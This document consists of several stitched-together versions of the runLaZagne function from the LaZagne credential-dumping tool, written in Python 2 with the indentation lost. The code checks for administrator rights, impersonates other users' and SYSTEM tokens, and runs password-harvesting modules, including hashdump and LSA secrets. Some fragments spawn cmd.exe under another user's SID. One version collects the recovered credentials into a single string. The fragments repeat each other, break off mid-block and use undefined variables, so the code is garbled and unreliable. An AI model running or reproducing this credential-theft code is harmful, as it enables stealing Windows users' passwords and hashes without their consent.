def runLaZagne(category_choosed='all'):
# ------ Part used for user impersonation ------
current_user = getpass.getuser().encode('utf-8', errors='ignore')
if not current_user.endswith('$'):
constant.finalResults = {'User': current_user}
print '\n\n########## User: %s ##########\n' % current_user
yield 'User', current_user
set_env_variables()
for r in runModule(category_choosed):
yield r
stdoutRes.append(constant.finalResults)
# Check if admin to impersonate
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
# --------- Impersonation using tokens ---------
sids = ListSids()
impersonateUsers = {}
impersonated_user = [current_user]
for sid in sids:
# Not save the current user's SIDs
if current_user != sid[3].split('\\', 1)[1]:
impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
[]).append(sid[2])
for user in impersonateUsers:
if 'service ' in user.lower() or ' service' in user.lower():
continue
print '\n\n########## User: %s ##########\n' % user.encode(
'utf-8', errors='ignore')
yield 'User', user
constant.finalResults = {'User': user}
for sid in impersonateUsers[user]:
try:
set_env_variables(user, toImpersonate=True)
if not impersonate_sid_long_handle(sid, close=False):
continue
# time.sleep(3)
_cannot_be_impersonate_using_tokens = False
_need_system_privileges = False
if sid == "S-1-5-18":
_need_system_privileges = True
else:
impersonated_user.append(user)
_cannot_be_impersonate_using_tokens = True
# Launch module wanted
for r in runModule(
category_choosed,
need_system_privileges=_need_system_privileges,
cannot_be_impersonate_using_tokens=
_cannot_be_impersonate_using_tokens):
yield r
rev2self()
stdoutRes.append(constant.finalResults)
break
except Exception, e:
print e
pass
# --------- Impersonation browsing file system
# Ready to check for all users remaining
all_users = get_user_list_on_filesystem(impersonated_user)
for user in all_users:
set_env_variables(user, toImpersonate=True)
print_debug(
'INFO', '[!] Trying to impersonate user: %s' %
user.encode('utf-8', errors='ignore'))
print '\n\n########## User: %s ##########\n' % user.encode(
'utf-8', errors='ignore')
# Fix value by default for user environnment (appdata and userprofile)
constant.finalResults = {'User': user}
yield 'User', user
# Retrieve passwords that need high privileges
for r in runModule(category_choosed, not_need_to_be_in_env=True):
yield r
stdoutRes.append(constant.finalResults)
def runLaZagne(category_choosed='all'):
# ------ Part used for user impersonation ------
current_user = getpass.getuser().encode('utf-8', errors='ignore')
if not current_user.endswith('$'):
constant.finalResults = {'User': current_user}
print_user(current_user)
yield 'User', current_user
set_env_variables()
for r in runModule(category_choosed):
yield r
stdoutRes.append(constant.finalResults)
# Check if admin to impersonate
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
# --------- Impersonation using tokens ---------
sids = ListSids()
impersonateUsers = {}
impersonated_user = [current_user]
for sid in sids:
# Not save the current user's SIDs
if current_user != sid[3].split('\\', 1)[1]:
impersonateUsers.setdefault(sid[3].split('\\', 1)[1], []).append(sid[2])
for user in impersonateUsers:
if 'service ' in user.lower() or ' service' in user.lower():
continue
print_user(user)
yield 'User', user
constant.finalResults = {'User': user}
for sid in impersonateUsers[user]:
try:
set_env_variables(user, toImpersonate=True)
impersonate_sid_long_handle(sid, close=False)
_cannot_be_impersonate_using_tokens = False
_need_system_privileges = False
if sid == "S-1-5-18":
_need_system_privileges = True
else:
impersonated_user.append(user)
_cannot_be_impersonate_using_tokens = True
# Launch module wanted
for r in runModule(category_choosed, need_system_privileges=_need_system_privileges, cannot_be_impersonate_using_tokens=_cannot_be_impersonate_using_tokens):
yield r
rev2self()
stdoutRes.append(constant.finalResults)
break
except Exception, e:
print e
pass
# --------- Impersonation browsing file system
# Ready to check for all users remaining
all_users = get_user_list_on_filesystem(impersonated_user)
for user in all_users:
set_env_variables(user, toImpersonate = True)
print_user(user)
# Fix value by default for user environnment (appdata and userprofile)
constant.finalResults = {'User': user}
# Retrieve passwords that need high privileges
for r in runModule(category_choosed, not_need_to_be_in_env=True):
yield r
stdoutRes.append(constant.finalResults)
def runLaZagne(category_choosed='all', password=None):
# useful if this function is called from another tool
if password:
constant.user_password = password
# ------ Part used for user impersonation ------
constant.username = getpass.getuser()
if not constant.username.endswith('$'):
constant.finalResults = {'User': constant.username}
print_user(constant.username)
yield 'User', constant.username
set_env_variables(user=constant.username)
for r in runModule(category_choosed):
yield r
stdoutRes.append(constant.finalResults)
# Check if admin to impersonate
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
# --------- Impersonation using tokens ---------
sids = ListSids()
impersonateUsers = {}
impersonated_user = [constant.username]
for sid in sids:
# Not save the current user's SIDs and not impersonate system user
if constant.username != sid[3].split(
'\\', 1)[1] and sid[2] != 'S-1-5-18':
impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
[]).append(sid[2])
for user in impersonateUsers:
if 'service' in user.lower().strip():
continue
print_user(user)
yield 'User', user
constant.finalResults = {'User': user}
for sid in impersonateUsers[user]:
try:
set_env_variables(user, toImpersonate=True)
impersonate_sid_long_handle(sid, close=False)
impersonated_user.append(user)
# Launch module wanted
for r in runModule(category_choosed, registry_used=False):
yield r
rev2self()
stdoutRes.append(constant.finalResults)
break
except Exception, e:
print e
# --------- Impersonation browsing file system ---------
# Ready to check for all users remaining
all_users = get_user_list_on_filesystem(impersonated_user)
for user in all_users:
# Fix value by default for user environnment (appdata and userprofile)
set_env_variables(user, toImpersonate=True)
print_user(user)
constant.username = user
constant.finalResults = {'User': user}
yield 'User', user
# Retrieve passwords that need high privileges
for r in runModule(category_choosed,
dpapi_used=False,
registry_used=False):
yield r
stdoutRes.append(constant.finalResults)
# --------- Execute System modules ---------
# System modules (hashdump, lsa secrets, etc.)
constant.username = '******'
constant.finalResults = {'User': constant.username}
if logging.getLogger().isEnabledFor(logging.INFO):
constant.st.print_user(constant.username)
yield 'User', constant.username
for r in runModule(category_choosed,
system_module=True,
dpapi_used=False):
yield r
stdoutRes.append(constant.finalResults)
for sid in impersonateUsers[users]:
try:
pid = int(
create_proc_as_sid(
sid, "cmd.exe /c %s %s" % (dst, argv)))
# Wait for the child process to end and keep the output into the stdoutRes variable
stdoutRes.append(childOutput(pid, tmpFile, True))
# Store user when the impersonation succeed
try:
impersonated_user.append(users.split('\\')[1])
except:
pass
rev2self()
break
except Exception, e:
print_debug('ERROR', e)
pass
except (KeyboardInterrupt, SystemExit):
print_debug('INFO', 'Keyboard interrupt. Cleaning Up')
try:
print_debug('INFO', '[!] Killing child process')
p = psutil.Process(pid)
p.kill()
print_debug('INFO', '[+] Child process killed')
except:
pass
cleanFileSystem(tmpFile)
def runLaZagne():
# ------ Part used for user impersonation ------
current_user = getpass.getuser().encode('utf-8', errors='ignore')
if not current_user.endswith('$'):
constant.finalResults = {'User': current_user}
print '\n\n########## User: %s ##########\n' % current_user
set_env_variables()
global creds
creds = ''
for r in runModule(category_choosed):
yield r
creds += str(r) + "\n"
stdoutRes.append(constant.finalResults)
# Check if admin to impersonate
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
# --------- Impersonation using tokens ---------
sids = ListSids()
impersonateUsers = {}
impersonated_user = [current_user]
for sid in sids:
# Not save the current user's SIDs
if current_user != sid[3].split('\\', 1)[1]:
impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
[]).append(sid[2])
for user in impersonateUsers:
if 'service ' in user.lower() or ' service' in user.lower():
continue
print '\n\n########## User: %s ##########\n' % user.encode(
'utf-8', errors='ignore')
constant.finalResults = {'User': user}
for sid in impersonateUsers[user]:
try:
set_env_variables(user, toImpersonate=True)
if not impersonate_sid_long_handle(sid, close=False):
continue
# time.sleep(3)
_cannot_be_impersonate_using_tokens = False
_need_system_privileges = False
if sid == "S-1-5-18":
_need_system_privileges = True
else:
impersonated_user.append(user)
_cannot_be_impersonate_using_tokens = True
# Launch module wanted
for r in runModule(
category_choosed,
need_system_privileges=_need_system_privileges,
cannot_be_impersonate_using_tokens=
_cannot_be_impersonate_using_tokens):
pass
rev2self()
break
except Exception, e:
print e
pass
for users in impersonateUsers.keys():
print_debug("INFO", "[!] Impersonate token user of %s" % users.encode("utf-8"))
for sid in impersonateUsers[users]:
try:
pid = int(create_proc_as_sid(sid, "cmd.exe /c %s %s" % (dst, argv)))
# Wait for the child process to end and keep the output into the stdoutRes variable
stdoutRes.append(childOutput(pid, tmpFile, True))
# Store user when the impersonation succeed
try:
impersonated_user.append(users.split("\\")[1])
except:
pass
rev2self()
break
except Exception, e:
print_debug("ERROR", e)
pass
except (KeyboardInterrupt, SystemExit):
print_debug("INFO", "Keyboard interrupt. Cleaning Up")
try:
print_debug("INFO", "[!] Killing child process")
p = psutil.Process(pid)
p.kill()
print_debug("INFO", "[+] Child process killed")
except:
pass
cleanFileSystem(tmpFile)
